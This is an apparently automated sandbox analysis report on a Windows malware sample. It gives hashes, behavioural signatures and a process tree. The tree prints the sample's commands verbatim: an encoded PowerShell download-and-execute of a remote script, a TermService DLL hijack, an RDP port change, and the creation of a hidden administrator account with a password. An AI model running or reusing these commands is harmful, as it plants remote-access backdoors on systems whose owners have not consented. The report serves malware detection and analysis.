Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-11-2020 20:56
Static task
static1
Behavioral task
behavioral1
Sample
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Resource
win10v20201028
General
-
Target
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
-
Size
3.4MB
-
MD5
442016bf1c6123cc40ff23c3637396c0
-
SHA1
cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
-
SHA256
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
-
SHA512
d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 6 1052 powershell.exe 8 1052 powershell.exe 10 1052 powershell.exe 11 1052 powershell.exe 13 1052 powershell.exe 15 1052 powershell.exe 17 1052 powershell.exe 19 1052 powershell.exe 21 1052 powershell.exe 23 1052 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1336 icacls.exe 2028 takeown.exe 672 icacls.exe 916 icacls.exe 1684 icacls.exe 1664 icacls.exe 1600 icacls.exe 1596 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1236 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1184 1184 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 916 icacls.exe 1684 icacls.exe 1664 icacls.exe 1600 icacls.exe 1596 icacls.exe 1336 icacls.exe 2028 takeown.exe 672 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bd63cd8-2104-445b-b872-74b25f6bb67c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8c98f86-232d-4488-a38a-a8451793dd0e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB5AE.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB797.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB7B8.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NUYW1GZC6O7O1XKLP9NF.temp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB7B7.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fee14587-daed-4f12-ad16-485efa50e64c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af13a0d0-3ed3-45b8-98a0-f841518eb630 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9ee1c35e-1029-4a9a-88af-9d89f9a353da powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB764.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB796.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_53395ee8-8a97-457d-8569-84c86017b2e1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c63bd23c-29f8-4b62-8ed7-3408cf9135e1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_36a5aeea-01ce-4898-b29b-211396e43e29 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB51C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB775.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB51D.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ad12ccf-7586-443f-85ee-866ef398d22d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aee8ed88-8fea-4889-9e46-b95e37cccb7d powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB763.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB776.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6786be1-0a4e-4a2b-86d9-02f2b983bc21 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB57C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB57D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB5AD.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB7D9.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB7DA.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 005f8ec4ddb7d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 1052 powershell.exe 1052 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 1184 1184 1184 1184 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1236 powershell.exe Token: SeRestorePrivilege 916 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1952 WMIC.exe Token: SeIncreaseQuotaPrivilege 1952 WMIC.exe Token: SeAuditPrivilege 1952 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1952 WMIC.exe Token: SeIncreaseQuotaPrivilege 1952 WMIC.exe Token: SeAuditPrivilege 1952 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1224 WMIC.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeAuditPrivilege 1224 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1224 WMIC.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeAuditPrivilege 1224 WMIC.exe Token: SeDebugPrivilege 1052 powershell.exe -
Suspicious use of WriteProcessMemory 127 IoCs
Processes:
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1700 wrote to memory of 1236 1700 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 1700 wrote to memory of 1236 1700 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 1700 wrote to memory of 1236 1700 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 1700 wrote to memory of 1236 1700 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 1236 wrote to memory of 300 1236 powershell.exe csc.exe PID 1236 wrote to memory of 300 1236 powershell.exe csc.exe PID 1236 wrote to memory of 300 1236 powershell.exe csc.exe PID 300 wrote to memory of 1692 300 csc.exe cvtres.exe PID 300 wrote to memory of 1692 300 csc.exe cvtres.exe PID 300 wrote to memory of 1692 300 csc.exe cvtres.exe PID 1236 wrote to memory of 2028 1236 powershell.exe takeown.exe PID 1236 wrote to memory of 2028 1236 powershell.exe takeown.exe PID 1236 wrote to memory of 2028 1236 powershell.exe takeown.exe PID 1236 wrote to memory of 672 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 672 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 672 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 916 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 916 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 916 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1684 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1684 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1684 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1664 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1664 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1664 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1600 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1600 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1600 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1596 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1596 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1596 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1336 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1336 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 1336 1236 powershell.exe icacls.exe PID 1236 wrote to memory of 476 1236 powershell.exe reg.exe PID 1236 wrote to memory of 476 1236 powershell.exe reg.exe PID 1236 wrote to memory of 476 1236 powershell.exe reg.exe PID 1236 wrote to memory of 1376 1236 powershell.exe reg.exe PID 1236 wrote to memory of 1376 1236 powershell.exe reg.exe PID 1236 wrote to memory of 1376 1236 powershell.exe reg.exe PID 1236 wrote to memory of 880 1236 powershell.exe reg.exe PID 1236 wrote to memory of 880 1236 powershell.exe reg.exe PID 1236 wrote to memory of 880 1236 powershell.exe reg.exe PID 1236 wrote to memory of 980 1236 powershell.exe net.exe PID 1236 wrote to memory of 980 1236 powershell.exe net.exe PID 1236 wrote to memory of 980 1236 powershell.exe net.exe PID 980 wrote to memory of 1692 980 net.exe net1.exe PID 980 wrote to memory of 1692 980 net.exe net1.exe PID 980 wrote to memory of 1692 980 net.exe net1.exe PID 1236 wrote to memory of 1912 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 1912 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 1912 1236 powershell.exe cmd.exe PID 1912 wrote to memory of 1636 1912 cmd.exe cmd.exe PID 1912 wrote to memory of 1636 1912 cmd.exe cmd.exe PID 1912 wrote to memory of 1636 1912 cmd.exe cmd.exe PID 1636 wrote to memory of 540 1636 cmd.exe net.exe PID 1636 wrote to memory of 540 1636 cmd.exe net.exe PID 1636 wrote to memory of 540 1636 cmd.exe net.exe PID 540 wrote to memory of 1444 540 net.exe net1.exe PID 540 wrote to memory of 1444 540 net.exe net1.exe PID 540 wrote to memory of 1444 540 net.exe net1.exe PID 1236 wrote to memory of 1440 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 1440 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 1440 1236 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES313E.tmp" "c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin ibcLpLqB /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin ibcLpLqB /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin ibcLpLqB /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin ibcLpLqB1⤵
-
C:\Windows\system32\net.exenet.exe user updwin ibcLpLqB2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin ibcLpLqB3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
